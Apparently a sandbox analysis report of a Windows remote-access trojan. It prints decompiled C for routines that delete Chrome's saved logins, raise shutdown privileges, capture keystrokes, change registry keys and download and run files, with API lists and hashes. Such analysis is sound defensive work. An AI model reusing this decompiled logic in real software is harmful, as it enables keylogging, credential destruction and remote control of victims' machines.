						_t320 = _t152;
						_t156 = E00410BF8(_t155, _t152);
					} else {
						__eflags = _t146 - 0xb;
						if(__eflags == 0) {
							_t158 = E00401F95(E00401E49( &_v92, __edx, __eflags, _t328));
							_t160 = E00401F95(E00401E49( &_v92, __edx, __eflags, 2));
							_t162 = E00401F95(E00401E49( &_v96, _t320, __eflags, 1));
							_t330 = 0;
							_t163 = E00401E49( &_v100, _t320, __eflags, 0);
							_t370 = _t353 - 0x18;
							E004020EC(_t203, _t370, _t320, __eflags, _t163);
							_t165 = E00410FB5(_t203, __eflags, _t160);
							_t320 = _t162;
							_t156 = E00410C3C(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
							_t369 = _t370 + 0x24;
						} else {
							_push(_t146);
							E00401E49( &_v92, __edx, __eflags, _t328);
							_push(E00402489());
							_push(E00401F95(E00401E49( &_v92, __edx, __eflags, _t328)));
							_t171 = E00401F95(E00401E49( &_v96, _t320, __eflags, 2));
							_t173 = E00401F95(E00401E49( &_v100, _t320, __eflags, 1));
							_t330 = 0;
							_t174 = E00401E49( &_v104, _t320, __eflags, 0);
							_t372 = _t353 - 0x18;
							E004020EC(_t203, _t372, _t320, __eflags, _t174);
							_t176 = E00410FB5(_t203, __eflags, _t171);
							_t320 = _t173;
							_t156 = E00410B08(_t176, _t173);
							_t369 = _t372 + 0x28;
						}
					}
					_t358 = _t369 - 0x18;
					_t233 = _t369 - 0x18;
					__eflags = _t156;
					if(__eflags == 0) {
						_push("5");
						goto L33;
					} else {
						_push("4");
						goto L20;
					}
				}
				_t384 = _t341 != 1;
				if(_t341 != 1) {
					goto L39;
				}
				E0040427F(_t203,  &_v80, E00401F95(E00401E49( &_v88, __edx, _t384, 1)));
				_t181 = E00401EEB( &_v84);
				_t182 = E00401E49( &_v96, __edx, _t384, 0);
				_t374 = _t353 - 0x18;
				E004020EC(_t203, _t374, __edx, _t384, _t182);
				_t185 = RegCreateKeyExW(E00410FB5(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
				RegCloseKey(_v112);
				_t376 = _t374 + 0x18 - 0x18;
				_t247 = _t374 + 0x18 - 0x18;
				_t385 = _t185;
				if(_t185 != 0) {
					_push("7");
					goto L12;
				}
				E00402084(_t203, _t247, "6");
				_push(0x72);
				E00404AA4(_t203, 0x46c700, _t320, _t385);
				_t205 = E00407323( &_v108, 0x46c700, 0x46c700);
				_t386 = _t205 - 0xffffffff;
				if(_t205 != 0xffffffff) {
					_t14 = _t205 + 1; // 0x1
					_t347 = 2;
					_push( ~(__eflags > 0) | _t14 * _t347);
					_v112 = E0042F4C6( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
					_t195 = E00401EEB(E00407309( &_v96,  &_v48, 0, _t205));
					_t206 = _v124;
					_t326 = _v124 - _t195;
					__eflags = _t326;
					do {
						_t313 =  *_t195 & 0x0000ffff;
						 *(_t326 + _t195) = _t313;
						_t195 = _t195 + _t347;
						__eflags = _t313;
					} while (__eflags != 0);
					E00401EF0();
					E004020EC(_t206, _t376 - 0x18, _t326, __eflags, E00401E49( &_v108, _t326, __eflags, 0));
					_t320 = 0;
					E00411046(_t206, 0, __eflags);
					E0042F4CF(_t206);
					goto L38;
				}
				E004020EC(_t205, _t376 - 0x18, _t320, _t386, E00401E49( &_v108, _t320, _t386, 0));
				_t320 = 0;
				_t217 = 0;
				goto L37;
			}

0x00411205
0x00411205
0x00411211
0x00411214
0x00411219
0x0041121d
0x00411223
0x00411228
0x00411229
0x0041122e
0x00411238
0x0041123d
0x00411247
0x00411250
0x00411255
0x00411258
0x0041125b
0x0041176b
0x00411779
0x0041177c
0x00411795
0x00411795
0x004117ab
0x004117b4
0x004117b9
0x004117bb
0x004117bd
0x004117bd
0x004117c5
0x004117c9
0x004117ce
0x004117d2
0x004117db
0x004117e3
0x004117f0
0x004117f0
0x00411261
0x00411264
0x004116f9
0x0041170c
0x00411711
0x0041171a
0x0041171f
0x00411725
0x0041172a
0x00411732
0x00411736
0x0041173c
0x0041173f
0x00411741
0x00411743
0x0041174f
0x00411754
0x00411754
0x00411760
0x00000000
0x00411760
0x00411745
0x0041154e
0x0041154e
0x0041155a
0x0041156f
0x00411581
0x00411586
0x0041158a
0x00000000
0x0041158f
0x0041126a
0x0041126d
0x004115b8
0x004115d8
0x004115dd
0x004115ea
0x004115ef
0x004115f5
0x004115fa
0x004115ff
0x00411609
0x0041160b
0x004116e0
0x004116e2
0x004113c2
0x004113c2
0x004113ce
0x00000000
0x004113ce
0x00411615
0x0041161c
0x0041162e
0x00411630
0x00411633
0x0041165a
0x00411666
0x0041166e
0x00411683
0x00411688
0x0041168e
0x0041168e
0x00411690
0x00411690
0x00411693
0x00411697
0x00411699
0x00411699
0x004116a2
0x004116ac
0x004116b1
0x004116b7
0x004116bc
0x004116bc
0x004116c0
0x004116c6
0x004116cb
0x004116ce
0x004116d1
0x004116d3
0x00000000
0x004116d3
0x0041163a
0x0041163f
0x00411645
0x0041164a
0x0041164e
0x00411653
0x00000000
0x00411653
0x00411273
0x00411276
0x004113eb
0x004113f5
0x004113f7
0x004114f1
0x004114fc
0x0041150f
0x00411514
0x00411514
0x0041151d
0x00411522
0x00411528
0x0041152d
0x00411532
0x00411535
0x00411539
0x004113fd
0x004113fd
0x00411400
0x00411482
0x00411499
0x004114ac
0x004114b1
0x004114ba
0x004114bf
0x004114c5
0x004114ca
0x004114d2
0x004114d6
0x004114db
0x00411402
0x00411402
0x00411404
0x00411410
0x00411422
0x00411430
0x00411443
0x00411448
0x00411451
0x00411456
0x0041145c
0x00411461
0x00411469
0x0041146d
0x00411472
0x00411472
0x00411400
0x00411540
0x00411543
0x00411545
0x00411547
0x00411597
0x00000000
0x00411549
0x00411549
0x00000000
0x00411549
0x00411547
0x0041127c
0x0041127f
0x00000000
0x00000000
0x0041129c
0x004112b6
0x004112c1
0x004112c6
0x004112cc
0x004112da
0x004112e6
0x004112ec
0x004112ef
0x004112f1
0x004112f3
0x004113bd
0x00000000
0x004113bd
0x004112fe
0x00411303
0x0041130a
0x0041131a
0x0041131c
0x0041131f
0x00411341
0x00411346
0x00411350
0x00411358
0x0041136d
0x00411372
0x00411378
0x00411378
0x0041137a
0x0041137a
0x0041137d
0x00411381
0x00411383
0x00411383
0x0041138c
0x004113a1
0x004113a6
0x004113aa
0x004113b0
0x00000000
0x004113b5
0x00411331
0x00411336
0x00411338
0x00000000

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
GetProcAddress.KERNEL32(00000000), ref: 004115CE

Strings

Shlwapi.dll, xrefs: 004115C2
SHDeleteKeyW, xrefs: 004115BD

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 99f62ac9a590e2cf4881d49ade79f59edc62e509e2edc6cc5568f42b4cc4750c
Instruction ID: 42533e532c22dbc36938cc4a5415c4332dc933708f84597f9d810698dd7565cc
Opcode Fuzzy Hash: 99f62ac9a590e2cf4881d49ade79f59edc62e509e2edc6cc5568f42b4cc4750c
Instruction Fuzzy Hash: B4E1D171A043005BCA14B7B6CC5B9BF76A95B95708F40052FFA42B71F3EE7C8948869A

Uniqueness

Uniqueness Score: -1.00%

Function 00412BE1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97
libraryloadershutdownCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00412BE1(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
				void* _t12;
				int _t14;
				int _t20;
				int _t22;
				int _t31;
				intOrPtr* _t64;
				void* _t69;

				_t69 = __eflags;
				E00413958();
				E00401E49( &_a16, __edx, _t69, 0);
				_t12 = E00405A6F("0");
				_push(0);
				_t70 = _t12;
				if(_t12 == 0) {
					E00401E49( &_a12, "0", __eflags);
					_t14 = E00405A6F("1");
					_push(0);
					__eflags = _t14;
					if(__eflags == 0) {
						E00401E49( &_a12, "1", __eflags);
						__eflags = E00405A6F("2");
						if(__eflags == 0) {
							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
							E00401E49( &_a16, "2", __eflags, 0);
							_t62 = "3";
							_t20 = E00405A6F("3");
							_push(0);
							__eflags = _t20;
							if(__eflags == 0) {
								E00401E49( &_a16, "3", __eflags);
								_t62 = "4";
								_t22 = E00405A6F("4");
								__eflags = _t22;
								if(_t22 != 0) {
									_push(0);
									_push(0);
									_push(1);
									goto L11;
								}
							} else {
								_push(0);
								_push(0);
								L11:
								 *_t64();
							}
						} else {
							_push(0);
							_t31 = E00436769(_t28, E00401F95(E00401E49( &_a16, "2", __eflags, 1))) | 0x00000002;
							__eflags = _t31;
							goto L6;
						}
					} else {
						_t31 = E00436769(_t33, E00401F95(E00401E49( &_a12, "1", __eflags, 1))) | 0x00000001;
						goto L6;
					}
				} else {
					_t31 = E00436769(_t36, E00401F95(E00401E49( &_a12, "0", _t70, 1)));
					L6:
					ExitWindowsEx(_t31, ??);
				}
				_t7 =  &_a16; // 0x404538
				E00401E74(_t7, _t62);
				E00401FC7();
				E00401FC7();
				return 0;
			}

0x00412be1
0x00412be1
0x00412bed
0x00412bf9
0x00412c02
0x00412c03
0x00412c05
0x00412c1d
0x00412c29
0x00412c32
0x00412c33
0x00412c35
0x00412c50
0x00412c61
0x00412c63
0x00412caa
0x00412cac
0x00412cb1
0x00412cb8
0x00412cbd
0x00412cbe
0x00412cc0
0x00412cca
0x00412ccf
0x00412cd6
0x00412cdb
0x00412cdd
0x00412ce3
0x00412ce4
0x00412ce5
0x00000000
0x00412ce5
0x00412cc2
0x00412cc2
0x00412cc3
0x00412ce7
0x00412ce7
0x00412ce7
0x00412c65
0x00412c65
0x00412c7e
0x00412c7e
0x00000000
0x00412c7e
0x00412c37
0x00412c4b
0x00000000
0x00412c4b
0x00412c07
0x00412c16
0x00412c81
0x00412c83
0x00412c83
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed

APIs

Part of subcall function 00413958: GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
Part of subcall function 00413958: OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
Part of subcall function 00413958: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
Part of subcall function 00413958: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
Part of subcall function 00413958: GetLastError.KERNEL32 ref: 004139A3

ExitWindowsEx.USER32(00000000,00000001), ref: 00412C83
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00412C98
GetProcAddress.KERNEL32(00000000), ref: 00412C9F

Strings

SetSuspendState, xrefs: 00412C8E
8E@, xrefs: 004133C4
PowrProf.dll, xrefs: 00412C93

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: 8E@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2852448523
Opcode ID: 84e4273dad6898ce6175a8507001792fcf22cc362d39f8daaa1f1a75ebb4b646
Instruction ID: e957077d6b30f4f4fae2d85640c458a1662694f4678ee8a5b01da8d46abf5029
Opcode Fuzzy Hash: 84e4273dad6898ce6175a8507001792fcf22cc362d39f8daaa1f1a75ebb4b646
Instruction Fuzzy Hash: 8621A9706043019BDA04FBF399569AF62499B4434DF10483F7A02BB1E3EF7C8D49865E

Uniqueness

Uniqueness Score: -1.00%

Function 00409EF4, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409EF4(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402084(_t20,  &_v52, E0043988A(_t20, __eflags, "UserProfile"));
				E00405343(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				E00401FC7();
				if(DeleteFileA(E00401F95( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402084(_t20, _t28);
						E0040A6EF(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401FC7();
				return _t21;
			}

0x00409ef4
0x00409ef4
0x00409f14
0x00409f19
0x00409f22
0x00409f38
0x00409f5e
0x00409f60
0x00000000
0x00409f3a
0x00409f41
0x00409f44
0x00409f52
0x00409f54
0x00409f65
0x00409f65
0x00409f6a
0x00409f6f
0x00409f4b
0x00409f4b
0x00409f4b
0x00409f44
0x00409f77
0x00409f82

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00409F30
GetLastError.KERNEL32 ref: 00409F3A

Strings

[Chrome StoredLogins found, cleared!], xrefs: 00409F60
UserProfile, xrefs: 00409F00
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00409EFB
[Chrome StoredLogins not found], xrefs: 00409F54

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 5358e033f04b3ba735fafe0af648e29bda63c7f1275d163f1c5bcd61de560829
Instruction ID: 7275058c39cf6625061bb5575175bc96433b562b483ef1af331301c458370d0d
Opcode Fuzzy Hash: 5358e033f04b3ba735fafe0af648e29bda63c7f1275d163f1c5bcd61de560829
Instruction Fuzzy Hash: 1A01A72165020757C609BAB5DD5B8BE7724A911309B50027FF806B61E3FD795E08C6DF

Uniqueness

Uniqueness Score: -1.00%

Function 00413958, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413958() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}

0x0041396c
0x0041397e
0x0041398a
0x00413996
0x0041399d
0x004139b2

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
GetLastError.KERNEL32 ref: 004139A3

Strings

SeShutdownPrivilege, xrefs: 00413978

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
Instruction ID: fcc62124dca6382e8ff7f462a1d037d759b9923c43a5f98482535144c24e2b82
Opcode Fuzzy Hash: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
Instruction Fuzzy Hash: 44F03A71902229ABDB10AFA0ED0DAEFBF7CEF05652F100064B805A1056E6348B14CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 0044D3FA, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0044D540

Strings

1#IND, xrefs: 0044E738
1#QNAN, xrefs: 0044E746
1#SNAN, xrefs: 0044E73F
1#INF, xrefs: 0044E74D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
Instruction ID: bf911c1a37dbfafd62c1db5ad45da0714cb81aa7e36eaf23024dd27f54a8ec40
Opcode Fuzzy Hash: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
Instruction Fuzzy Hash: D2C24872E086288FEB25CE299D407EAB7B5FB44305F1541EBD80DE7240E778AE818F45

Uniqueness

Uniqueness Score: -1.00%

Function 004077EC, Relevance: 9.3, APIs: 6, Instructions: 324fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004077F1

Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

__CxxThrowException@8.LIBVCRUNTIME ref: 0040789E
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FC
FindNextFileW.KERNEL32(00000000,?), ref: 00407954
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796B

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

FindClose.KERNEL32(00000000), ref: 00407BA9

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
String ID:
API String ID: 2104358809-0
Opcode ID: d5325abe13c347f29ec421261d5b7aba2d638baced682e6bed6f7fc6740840f6
Instruction ID: c2b305b608749dbe3c980790889d4cdccc335bbb97c8ab2c1357a9fa12a4aca1
Opcode Fuzzy Hash: d5325abe13c347f29ec421261d5b7aba2d638baced682e6bed6f7fc6740840f6
Instruction Fuzzy Hash: DAC170729041099ADB14FB61CD52AEE7375AF10318F10417FE906B71D2EF386B49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004089BA, Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089EE
GetWindowThreadProcessId.USER32(00000000,?), ref: 004089F9
GetKeyboardLayout.USER32(00000000), ref: 00408A00
GetKeyState.USER32(00000010), ref: 00408A0A
GetKeyboardState.USER32(?), ref: 00408A17
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A33

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 28d55651ec39c1e0e1e44cca33abdfe281183258b8dcf964721f4baf851690d3
Instruction ID: 26b3eb51535ef2b13c0bd12becad5a44fa7f6c6827bdf572dc9a3ff542bbf600
Opcode Fuzzy Hash: 28d55651ec39c1e0e1e44cca33abdfe281183258b8dcf964721f4baf851690d3
Instruction Fuzzy Hash: B2110072900208BBDB109FA4DC49FEA77ACEB0C746F100465FA04E6191DA75EA54CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0044A6BC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A755
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A77E
GetACP.KERNEL32(?,?,0044A9DB,?,00000000), ref: 0044A793

Strings

ACP, xrefs: 0044A6DA
OCP, xrefs: 0044A710

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
Instruction ID: 46499b20fc6e19d8fdaaf79e5441ca5821e5cfb246ab753f5a47199e6154391f
Opcode Fuzzy Hash: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
Instruction Fuzzy Hash: 3C21F876680200A6F730CF64C901B9773BAEF54F65B568427E80AC7312E73ADD61C39A

Uniqueness

Uniqueness Score: -1.00%

Function 00416C39, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 00416C4A
LoadResource.KERNEL32(00000000,?,?,?,0040CC70), ref: 00416C5E
LockResource.KERNEL32(00000000,?,?,?,0040CC70), ref: 00416C65
SizeofResource.KERNEL32(00000000,?,?,?,0040CC70), ref: 00416C74

Strings

SETTINGS, xrefs: 00416C3D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 366bf9c706c1e74d5dfbd1c4b7779a97350d9a524096fbd79053f48df9282c47
Instruction ID: 37f18acc70127db685c8f9ca998c816c09d2ba1f0d15f4cc177e32bd420b5c87
Opcode Fuzzy Hash: 366bf9c706c1e74d5dfbd1c4b7779a97350d9a524096fbd79053f48df9282c47
Instruction Fuzzy Hash: 72E01A36600790ABD7211FB1AC4CD173E79EFCABA37100035F601C6221EB76C880CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407C55, Relevance: 7.7, APIs: 5, Instructions: 246fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407C5A

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00407CD2
FindNextFileW.KERNEL32(00000000,?), ref: 00407CFB
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00407D12

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNextchar_traits
String ID:
API String ID: 3260228402-0
Opcode ID: bf98f09b1d7c52afb730002c3bb8bf2a6021080ad7ea1047f96c538e4cc49e73
Instruction ID: 3f7feca7001ac29e2efe6dfa4d48dadfc39b28ff3590cbdafeaa97567dc4b3d4
Opcode Fuzzy Hash: bf98f09b1d7c52afb730002c3bb8bf2a6021080ad7ea1047f96c538e4cc49e73
Instruction Fuzzy Hash: 5C915E329041099BCB15EB61CD919EE7379AF20348F10417FE906B71E2EF386B49DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0044A890, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044A99C
IsValidCodePage.KERNEL32(00000000), ref: 0044A9F7
IsValidLocale.KERNEL32(?,00000001), ref: 0044AA06
GetLocaleInfoW.KERNEL32(?,00001001,0043E2C1,00000040,?,0043E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0044AA4E
GetLocaleInfoW.KERNEL32(?,00001002,0043E341,00000040), ref: 0044AA6D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
Instruction ID: 9b105efebd2c88567e68d059c0bbbfc36751d73e0e30cf1546c616c965cf3a16
Opcode Fuzzy Hash: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
Instruction Fuzzy Hash: CC5181B1940205ABFB10DFA5CC45ABF73B8BF08701F15486BE900E7291D7789914CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00405C8B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405DA3
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00405E87

Strings

open, xrefs: 00405D9D
C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 00405DEE, 00405F16

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\SysWOW64\DpiScaling.exe$open
API String ID: 2825088817-3153102537
Opcode ID: e0485a9113288dd0168ce50b722bb27cda49acde5fb3046a2836ae3b189f4bf3
Instruction ID: 2f760819637a24086e5c2a0131b8e6f6cb93aac805846b5c6f9a7bfdcc7dded0
Opcode Fuzzy Hash: e0485a9113288dd0168ce50b722bb27cda49acde5fb3046a2836ae3b189f4bf3
Instruction Fuzzy Hash: 9C61B37160430157CA14FB76C85697F37A99F95308F10093FB9467B1E3EE3C8A498A9B

Uniqueness

Uniqueness Score: -1.00%

Function 00449F58, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043E2C8,?,?,?,?,0043DD1F,?,00000004), ref: 0044A03A
_wcschr.LIBVCRUNTIME ref: 0044A0CA
_wcschr.LIBVCRUNTIME ref: 0044A0D8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043E2C8,00000000,0043E3E8), ref: 0044A17B

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: a93cbbae9c8a1cc1fc9dd236a8a740af6bdf31657da38eb13c6d36a73e99b63a
Instruction ID: 0c1e26b01cd281ff3e6eed0d7611659232f5724f520d43583c2334efc1484ff5
Opcode Fuzzy Hash: a93cbbae9c8a1cc1fc9dd236a8a740af6bdf31657da38eb13c6d36a73e99b63a
